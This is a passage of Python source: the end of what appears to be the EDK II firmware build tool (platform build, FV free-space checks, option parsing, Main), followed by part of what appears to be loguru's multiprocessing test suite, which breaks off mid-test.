    return Wa, BuildModules
def _MultiThreadBuildPlatform(self):
    """Build the active platform with the multi-process AutoGen path.

    Per (target, toolchain): run (or verify and skip) AutoGen, schedule
    module builds through BuildTask, then regenerate the FD image and the
    platform MAP file for ''/'all'/'fds' targets.
    """
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            resetFdsGlobalVariable()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            ExitFlag = threading.Event()
            ExitFlag.clear()
            if self.SkipAutoGen:
                Wa = self.VerifyAutoGenFiles()
                if Wa is None:
                    # Previous AutoGen products are stale; fall back to a full pass.
                    self.SkipAutoGen = False
                    Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
                else:
                    GlobalData.gAutoGenPhase = True
                    self.BuildModules = self.SetupMakeSetting(Wa)
            else:
                Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
            Pa = Wa.AutoGenObjectList[0]
            GlobalData.gAutoGenPhase = False

            if GlobalData.gBinCacheSource:
                EdkLogger.quiet("[cache Summary]: Total module num: %s" % len(self.AllModules))
                EdkLogger.quiet("[cache Summary]: PreMakecache miss num: %s " % len(self.PreMakeCacheMiss))
                EdkLogger.quiet("[cache Summary]: Makecache miss num: %s " % len(self.MakeCacheMiss))

            for Arch in Wa.ArchList:
                MakeStart = time.time()
                for Ma in set(self.BuildModules):
                    # Generate build task for the module
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        Pa.CreateMakeFile(False)
                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)

                # in case there's an interruption. we need a full version of makefile for platform
                if BuildTask.HasError():
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))

            MakeContiue = time.time()
            #
            #
            # All modules have been put in build tasks queue. Tell task scheduler
            # to exit if all tasks are completed
            #
            ExitFlag.set()
            BuildTask.WaitForComplete()
            if GlobalData.gBinCacheDest:
                self.GenDestCache()
            elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
                # Only for --hash
                # Update PreMakeCacheChain files
                self.GenLocalPreMakeCache()
            #
            # Get Module List (non-library modules, keyed by upper-case GUID)
            #
            ModuleList = {ma.Guid.upper(): ma for ma in self.BuildModules}
            self.BuildModules = []
            self.MakeTime += int(round((time.time() - MakeContiue)))
            #
            # Check for build error, and raise exception if one
            # has been signaled.
            #
            if BuildTask.HasError():
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)

            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")

                #
                # Rebase module to the preferred memory address before GenFds
                #
                MapBuffer = []
                if self.LoadFixAddress != 0:
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)

                if self.Fdf:
                    #
                    # Generate FD image if there's a FDF file found
                    #
                    GenFdsStart = time.time()
                    if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
                        EdkLogger.error("build", COMMAND_FAILURE)
                    Threshold = self.GetFreeSizeThreshold()
                    if Threshold:
                        self.CheckFreeSizeThreshold(Threshold, Wa.FvDir)

                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                    self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile(MapBuffer, Wa)
            self.CreateGuidedSectionToolsFile(Wa)
## GetFreeSizeThreshold()
#
# @retval int Threshold value
#
def GetFreeSizeThreshold(self):
    """Parse the -D FV_SPARE_SPACE_THRESHOLD value into an int.

    Accepts decimal or 0x-prefixed hex; returns None when the define is
    absent or unparsable (a warning is logged in the latter case).
    """
    raw = GlobalData.gCommandLineDefines.get('FV_SPARE_SPACE_THRESHOLD')
    if not raw:
        return None
    base = 16 if raw.lower().startswith('0x') else 10
    try:
        return int(raw, base)
    except:
        EdkLogger.warn("build", 'incorrect value for FV_SPARE_SPACE_THRESHOLD %s.Only decimal or hex format is allowed.' % raw)
    return None
def CheckFreeSizeThreshold(self, Threshold=None, FvDir=None):
    """Fail the build when any in-FD FV's free space drops below Threshold.

    Scans each <FV>.Fv.map in FvDir for EFI_FV_SPACE_SIZE and raises a
    build error if that value is smaller than the required spare space.
    Silently does nothing when Threshold/FvDir are not usable.
    """
    if not isinstance(Threshold, int):
        return
    if not isinstance(FvDir, str) or not FvDir:
        return
    fdf_profile = GlobalData.gFdfParser.Profile
    # Only FVs that actually live inside an FD region are checked.
    in_fd_fvs = {name for name in fdf_profile.FvDict if fdf_profile.FvDict[name].FvRegionInFD}
    for fv_name in fdf_profile.FvDict:
        if fv_name not in in_fd_fvs:
            continue
        map_path = os.path.join(FvDir, fv_name.upper() + '.Fv.map')
        if not os.path.exists(map_path):
            continue
        for line in getlines(map_path):
            key_value = line.split('=')
            if len(key_value) == 2 and key_value[0].strip() == 'EFI_FV_SPACE_SIZE':
                free_size = int(key_value[1].strip(), 0)
                if free_size < Threshold:
                    EdkLogger.error("build", FV_FREESIZE_ERROR,
                                    '%s FV free space %d is not enough to meet with the required spare space %d set by -D FV_SPARE_SPACE_THRESHOLD option.' % (
                                        fv_name, free_size, Threshold))
                break
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self,Wa):
    """Write GuidedSectionTools.txt (GUID, tool name, tool path per line)
    into the FV directory for every (target, toolchain, arch) combination.

    DSC [BuildOptions] entries take precedence over tools_def.txt entries;
    duplicate GUIDs within either source are a build error.
    """
    for BuildTarget in self.BuildTargetList:
        for ToolChain in self.ToolChainList:
            FvDir = Wa.FvDir
            if not os.path.exists(FvDir):
                continue
            for Arch in self.ArchList:
                guidList = []
                tooldefguidList = []
                guidAttribs = []
                for Platform in Wa.AutoGenObjectList:
                    if Platform.BuildTarget != BuildTarget:
                        continue
                    if Platform.ToolChain != ToolChain:
                        continue
                    if Platform.Arch != Arch:
                        continue
                    # Platform [BuildOptions] GUIDed tools first.
                    if hasattr (Platform, 'BuildOption'):
                        for Tool in Platform.BuildOption:
                            if 'GUID' in Platform.BuildOption[Tool]:
                                if 'PATH' in Platform.BuildOption[Tool]:
                                    value = Platform.BuildOption[Tool]['GUID']
                                    if value in guidList:
                                        EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in DSC [BuildOptions]." % (value, Tool))
                                    path = Platform.BuildOption[Tool]['PATH']
                                    guidList.append(value)
                                    guidAttribs.append((value, Tool, path))
                    # Then tools_def.txt GUIDed tools (platform wins on overlap).
                    for Tool in Platform.ToolDefinition:
                        if 'GUID' in Platform.ToolDefinition[Tool]:
                            if 'PATH' in Platform.ToolDefinition[Tool]:
                                value = Platform.ToolDefinition[Tool]['GUID']
                                if value in tooldefguidList:
                                    EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in tools_def.txt." % (value, Tool))
                                tooldefguidList.append(value)
                                if value in guidList:
                                    # Already added by platform
                                    continue
                                path = Platform.ToolDefinition[Tool]['PATH']
                                guidList.append(value)
                                guidAttribs.append((value, Tool, path))
                # Sort by GuidTool name
                guidAttribs = sorted (guidAttribs, key=lambda x: x[1])
                # Write out GuidedSecTools.txt.  Fix: use a context manager so
                # the handle is closed even if a write raises (the original
                # leaked the open file on error).
                toolsFilePath = os.path.join(FvDir, 'GuidedSectionTools.txt')
                with open(toolsFilePath, 'wt') as toolsFile:
                    for guidedSectionTool in guidAttribs:
                        print(' '.join(guidedSectionTool), file=toolsFile)
## Returns the real path of the tool.
#
def GetRealPathOfTool (self, tool):
    """Resolve *tool* to a canonical path; unknown paths pass through unchanged."""
    if not os.path.exists(tool):
        # Nothing on disk to canonicalize: hand the string back as-is.
        return tool
    return os.path.realpath(tool)
## Launch the module or platform build
#
def Launch(self):
    """Dispatch to the module build or the (multi-threaded) platform build.

    Spawn mode is only honoured for full-platform ''/'all' builds; any
    other combination falls back to the single-threaded path.  After
    'cleanall' the build database directory is removed as well.
    """
    # Reset per-run bookkeeping sets before dispatching.
    for attr in ('AllDrivers', 'AllModules',
                 'PreMakeCacheMiss', 'PreMakeCacheHit',
                 'MakeCacheMiss', 'MakeCacheHit'):
        setattr(self, attr, set())
    if self.ModuleFile:
        self.SpawnMode = False
        self._BuildModule()
    elif self.SpawnMode and self.Target in ["", "all"]:
        self._MultiThreadBuildPlatform()
    else:
        self.SpawnMode = False
        self._BuildPlatform()
    if self.Target == 'cleanall':
        RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
    """Emit the as-built INF for every module scheduled in this pass."""
    for built_module in self.BuildModules:
        built_module.CreateAsBuiltInf()
def GenDestCache(self):
    """Populate the binary cache destination from every processed module."""
    for cached_module in self.AllModules:
        # Hash lists are generated first so the cached copy is self-describing.
        cached_module.GenPreMakefileHashList()
        cached_module.GenMakefileHashList()
        cached_module.CopyModuleToCache()
def GenLocalPreMakeCache(self):
    """Refresh PreMake hash chains for pre-make cache misses (--hash only)."""
    for missed_module in self.PreMakeCacheMiss:
        missed_module.GenPreMakefileHashList()
## Do some clean-up works when error occurred
def Relinquish(self):
    """Abort outstanding progress/tasks so a failing build exits safely."""
    saved_level = EdkLogger.GetLevel()
    # Silence everything below ERROR while tearing down.
    EdkLogger.SetLevel(EdkLogger.ERROR)
    Utils.Progressor.Abort()
    if self.SpawnMode == True:
        BuildTask.Abort()
    EdkLogger.SetLevel(saved_level)
def ParseDefines(DefineList=None):
    """Parse '-D NAME[=VALUE]' macro definitions into a dict.

    A bare NAME maps to the string "TRUE"; NAME=VALUE maps to the stripped
    VALUE.  Macro names must match GlobalData.gMacroNamePattern or a build
    error is raised.

    Fix: the default was a mutable list ([]); it is now None, which is
    behaviorally identical for all callers (both yield an empty dict) but
    removes the shared-mutable-default hazard.
    """
    DefineDict = {}
    if DefineList is not None:
        for Define in DefineList:
            # Split on the first '=' only so values may themselves contain '='.
            DefineTokenList = Define.split("=", 1)
            if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
                EdkLogger.error('build', FORMAT_INVALID,
                                "The macro name must be in the pattern [A-Z][A-Z0-9_]*",
                                ExtraData=DefineTokenList[0])
            if len(DefineTokenList) == 1:
                DefineDict[DefineTokenList[0]] = "TRUE"
            else:
                DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
    return DefineDict
def LogBuildTime(Time):
    """Format a duration in seconds as "HH:MM:SS[, N day(s)]".

    Returns None for a falsy duration (0 or None).
    """
    if not Time:
        return None
    parts = time.gmtime(Time)
    formatted = time.strftime("%H:%M:%S", parts)
    # gmtime starts at day-of-year 1; anything past day 1 means >= 24 hours.
    if parts.tm_yday > 1:
        formatted += ", %d day(s)" % (parts.tm_yday - 1)
    return formatted
def ThreadNum():
    """Resolve the number of build worker threads.

    Priority: the -n command-line option, then MAX_CONCURRENT_THREAD_NUMBER
    from target.txt, then the machine CPU count (falling back to 1).
    Also records the -conf directory in GlobalData as a side effect.
    """
    parser = MyOptionParser()
    if not parser.BuildOption and not parser.BuildTarget:
        parser.GetOption()
    options = parser.BuildOption
    thread_count = options.ThreadNumber
    GlobalData.gCmdConfDir = options.ConfDirectory
    if thread_count is None:
        # Fall back to the target.txt setting; '' means "unset".
        target_obj = TargetTxtDict()
        raw = target_obj.Target.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
        thread_count = 0 if raw == '' else int(raw, 0)
    if thread_count == 0:
        # 0 means "auto": one thread per CPU, or 1 when undetectable.
        try:
            thread_count = multiprocessing.cpu_count()
        except (ImportError, NotImplementedError):
            thread_count = 1
    return thread_count
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0     Tool was successful
# @retval 1     Tool failed
#
# Bound for the inter-process log queue: ten pending records per worker thread.
LogQMaxSize = ThreadNum() * 10
def Main():
    """Tool entry point: parse options, run the build, report the result.

    Returns 0 on success or a non-zero error code; all fatal conditions are
    funneled through the except clauses so a summary and total build time
    are always printed.
    """
    StartTime = time.time()

    #
    # Create a log Queue
    #
    LogQ = mp.Queue(LogQMaxSize)
    # Initialize log system
    EdkLogger.LogClientInitialize(LogQ)
    GlobalData.gCommand = sys.argv[1:]
    #
    # Parse the options and args
    #
    OptionParser = MyOptionParser()
    if not OptionParser.BuildOption and not OptionParser.BuildTarget:
        OptionParser.GetOption()
    Option, Target = OptionParser.BuildOption, OptionParser.BuildTarget
    GlobalData.gOptions = Option
    GlobalData.gCaseInsensitive = Option.CaseInsensitive

    # Set log level
    LogLevel = EdkLogger.INFO
    if Option.verbose is not None:
        EdkLogger.SetLevel(EdkLogger.VERBOSE)
        LogLevel = EdkLogger.VERBOSE
    elif Option.quiet is not None:
        EdkLogger.SetLevel(EdkLogger.QUIET)
        LogLevel = EdkLogger.QUIET
    elif Option.debug is not None:
        EdkLogger.SetLevel(Option.debug + 1)
        LogLevel = Option.debug + 1
    else:
        EdkLogger.SetLevel(EdkLogger.INFO)

    if Option.WarningAsError == True:
        EdkLogger.SetWarningAsError()
    # The log agent drains LogQ in a separate process/thread.
    Log_Agent = LogAgent(LogQ,LogLevel,Option.LogFile)
    Log_Agent.start()

    if platform.platform().find("Windows") >= 0:
        GlobalData.gIsWindows = True
    else:
        GlobalData.gIsWindows = False

    EdkLogger.quiet("Build environment: %s" % platform.platform())
    EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
    ReturnCode = 0
    MyBuild = None
    BuildError = True
    try:
        # Normalize/validate the build target argument.
        if len(Target) == 0:
            Target = "all"
        elif len(Target) >= 2:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
                            ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
        else:
            Target = Target[0].lower()
            if Target not in gSupportedTarget:
                EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
                                ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))

        #
        # Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
        #
        CheckEnvVariable()
        GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))

        Workspace = os.getenv("WORKSPACE")
        #
        # Get files real name in workspace dir
        #
        GlobalData.gAllFiles = Utils.DirCache(Workspace)

        WorkingDirectory = os.getcwd()
        # Without -m, a single INF in the current directory implies a module build.
        if not Option.ModuleFile:
            FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
            FileNum = len(FileList)
            if FileNum >= 2:
                EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
                                ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
            elif FileNum == 1:
                Option.ModuleFile = NormFile(FileList[0], Workspace)

        # Normalize the module/platform/FDF paths to workspace-relative PathClass objects.
        if Option.ModuleFile:
            if os.path.isabs (Option.ModuleFile):
                if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
                    Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
            Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
            ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)

        if Option.PlatformFile is not None:
            if os.path.isabs (Option.PlatformFile):
                if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
                    Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
            Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)

        if Option.FdfFile is not None:
            if os.path.isabs (Option.FdfFile):
                if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
                    Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
            Option.FdfFile = PathClass(Option.FdfFile, Workspace)
            ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)

        if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
            EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")

        MyBuild = Build(Target, Workspace, Option,LogQ)
        GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
        if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
            MyBuild.Launch()

        #
        # All job done, no error found and no exception raised
        #
        BuildError = False
    except FatalError as X:
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = X.args[0]
    except Warning as X:
        # error from Fdf parser
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        else:
            EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
        ReturnCode = FORMAT_INVALID
    except KeyboardInterrupt:
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        ReturnCode = ABORT_ERROR
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
    except:
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()

        # try to get the meta-file from the object causing exception
        Tb = sys.exc_info()[-1]
        MetaFile = GlobalData.gProcessingFile
        while Tb is not None:
            if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
                MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
            Tb = Tb.tb_next
        EdkLogger.error(
                    "\nbuild",
                    CODE_ERROR,
                    "Unknown fatal error when processing [%s]" % MetaFile,
                    ExtraData="\n(Please send email to %s for help, attaching following call stack trace!)\n" % MSG_EDKII_MAIL_ADDR,
                    RaiseError=False
                    )
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = CODE_ERROR
    finally:
        Utils.Progressor.Abort()
        Utils.ClearDuplicatedInf()

    if ReturnCode == 0:
        try:
            MyBuild.LaunchPostbuild()
            Conclusion = "Done"
        except:
            Conclusion = "Failed"
            ReturnCode = POSTBUILD_ERROR
    elif ReturnCode == ABORT_ERROR:
        Conclusion = "Aborted"
    else:
        Conclusion = "Failed"
    FinishTime = time.time()
    BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
    BuildDurationStr = ""
    if BuildDuration.tm_yday > 1:
        BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
    else:
        BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
    if MyBuild is not None:
        if not BuildError:
            MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))

    EdkLogger.SetLevel(EdkLogger.QUIET)
    EdkLogger.quiet("\n- %s -" % Conclusion)
    EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
    EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
    Log_Agent.kill()
    Log_Agent.join()
    return ReturnCode
if __name__ == '__main__':
    try:
        # Use 'spawn' so worker processes never inherit build state via fork.
        mp.set_start_method('spawn')
    except:
        # The start method may already be fixed (or unsupported on this
        # platform); keep whatever default is in effect.
        pass
    r = Main()
    ## 0-127 is a safe return range, and 1 is a standard default error
    if r < 0 or r > 127: r = 1
    sys.exit(r)
|
test_multiprocessing.py | import os
import sys
import multiprocessing
import loguru
from loguru import logger
import time
import pytest
def do_something(i):
    """Log one numbered message; executed inside pool workers."""
    logger.info("#{}", i)
def set_logger(logger_):
    """Pool initializer: install the (pickled) parent logger as this module's logger."""
    global logger
    logger = logger_
def subworker(logger_):
    """Child-process target: log through the logger passed as an argument."""
    logger_.info("Child")
def subworker_inheritance():
    """Child-process target: log through the module-level logger inherited via fork."""
    logger.info("Child")
def subworker_remove(logger_):
    """Log once, remove all handlers, then log again (second message must be dropped)."""
    logger_.info("Child")
    logger_.remove()
    logger_.info("Nope")
def subworker_remove_inheritance():
    """Same as subworker_remove but using the inherited module-level logger."""
    logger.info("Child")
    logger.remove()
    logger.info("Nope")
def subworker_barrier(logger_, barrier):
    """Log, sync with the parent on *barrier*, then log after the parent removed the sink."""
    logger_.info("Child")
    barrier.wait()
    time.sleep(0.5)
    logger_.info("Nope")
def subworker_barrier_inheritance(barrier):
    """Same as subworker_barrier but using the inherited module-level logger."""
    logger.info("Child")
    barrier.wait()
    time.sleep(0.5)
    logger.info("Nope")
class Writer:
    """In-memory sink that accumulates everything written to it."""

    def __init__(self):
        # Collected chunks; joined lazily in read().
        self._chunks = []

    def write(self, message):
        """Append *message* to the captured output."""
        self._chunks.append(message)

    def read(self):
        """Return everything written so far as a single string."""
        return "".join(self._chunks)
def test_apply_spawn(monkeypatch):
    """Pool.apply with a 'spawn' context: worker and main logs all reach the sink in order."""
    ctx = multiprocessing.get_context("spawn")
    # Make loguru's internal queue use the same context as the pool.
    monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    with ctx.Pool(1, set_logger, [logger]) as pool:
        for i in range(3):
            pool.apply(do_something, (i,))
        pool.close()
        pool.join()
    logger.info("Done!")
    logger.remove()
    assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_fork():
    """Pool.apply under fork; the logger is handed to workers via the pool initializer."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    with multiprocessing.Pool(1, set_logger, [logger]) as pool:
        for i in range(3):
            pool.apply(do_something, (i,))
        pool.close()
        pool.join()
    logger.info("Done!")
    logger.remove()
    assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_inheritance():
    """Pool.apply under fork; workers inherit the module-level logger (no initializer)."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    with multiprocessing.Pool(1) as pool:
        for i in range(3):
            pool.apply(do_something, (i,))
        pool.close()
        pool.join()
    logger.info("Done!")
    logger.remove()
    assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_apply_async_spawn(monkeypatch):
    """apply_async with a 'spawn' context; get() after each call forces ordering."""
    ctx = multiprocessing.get_context("spawn")
    monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    with ctx.Pool(1, set_logger, [logger]) as pool:
        for i in range(3):
            result = pool.apply_async(do_something, (i,))
            result.get()
        pool.close()
        pool.join()
    logger.info("Done!")
    logger.remove()
    assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_fork():
    """apply_async under fork with the logger passed through the pool initializer."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    with multiprocessing.Pool(1, set_logger, [logger]) as pool:
        for i in range(3):
            result = pool.apply_async(do_something, (i,))
            result.get()
        pool.close()
        pool.join()
    logger.info("Done!")
    logger.remove()
    assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_inheritance():
    """apply_async under fork with the module-level logger inherited by the worker."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    with multiprocessing.Pool(1) as pool:
        for i in range(3):
            result = pool.apply_async(do_something, (i,))
            result.get()
        pool.close()
        pool.join()
    logger.info("Done!")
    logger.remove()
    assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_process_spawn(monkeypatch):
    """A single spawned Process logging through the pickled logger."""
    ctx = multiprocessing.get_context("spawn")
    monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    process = ctx.Process(target=subworker, args=(logger,))
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_fork():
    """A single forked Process logging through the logger passed as an argument."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker, args=(logger,))
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_inheritance():
    """A single forked Process logging through the inherited module-level logger."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker_inheritance)
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    assert writer.read() == "Child\nMain\n"
def test_remove_in_child_process_spawn(monkeypatch):
    """Child calls remove(): its later messages are dropped, parent sink stays intact."""
    ctx = multiprocessing.get_context("spawn")
    monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    process = ctx.Process(target=subworker_remove, args=(logger,))
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_fork():
    """Same as the spawn variant, but under fork with the logger passed explicitly."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker_remove, args=(logger,))
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_inheritance():
    """Same as above, but the child uses the inherited module-level logger."""
    writer = Writer()
    logger.add(writer, format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker_remove_inheritance)
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    assert writer.read() == "Child\nMain\n"
def test_remove_in_main_process_spawn(monkeypatch):
    """Parent removes the sink while a spawned child still logs; a barrier orders the two."""
    # Actually, this test may fail if sleep time in main process is too small (and no barrier used)
    # In such situation, it seems the child process has not enough time to initialize itself
    # It may fail with an "EOFError" during unpickling of the (garbage collected / closed) Queue
    ctx = multiprocessing.get_context("spawn")
    monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
    writer = Writer()
    barrier = ctx.Barrier(2)
    logger.add(writer, format="{message}", enqueue=True)
    process = ctx.Process(target=subworker_barrier, args=(logger, barrier))
    process.start()
    barrier.wait()
    logger.info("Main")
    logger.remove()
    process.join()
    assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_fork():
    """Fork variant: the child's post-barrier message must not reach the removed sink."""
    writer = Writer()
    barrier = multiprocessing.Barrier(2)
    logger.add(writer, format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker_barrier, args=(logger, barrier))
    process.start()
    barrier.wait()
    logger.info("Main")
    logger.remove()
    process.join()
    assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_inheritance():
    """Fork variant with the inherited module-level logger in the child."""
    writer = Writer()
    barrier = multiprocessing.Barrier(2)
    logger.add(writer, format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker_barrier_inheritance, args=(barrier,))
    process.start()
    barrier.wait()
    logger.info("Main")
    logger.remove()
    process.join()
    assert writer.read() == "Child\nMain\n"
def test_not_picklable_sinks_spawn(monkeypatch, tmpdir, capsys):
    """enqueue=True must work even when sinks (stream, lambda) are not picklable - spawn."""
    ctx = multiprocessing.get_context("spawn")
    monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
    filepath = tmpdir.join("test.log")
    stream = sys.stderr
    output = []
    logger.add(str(filepath), format="{message}", enqueue=True)
    logger.add(stream, format="{message}", enqueue=True)
    logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
    process = ctx.Process(target=subworker, args=[logger])
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
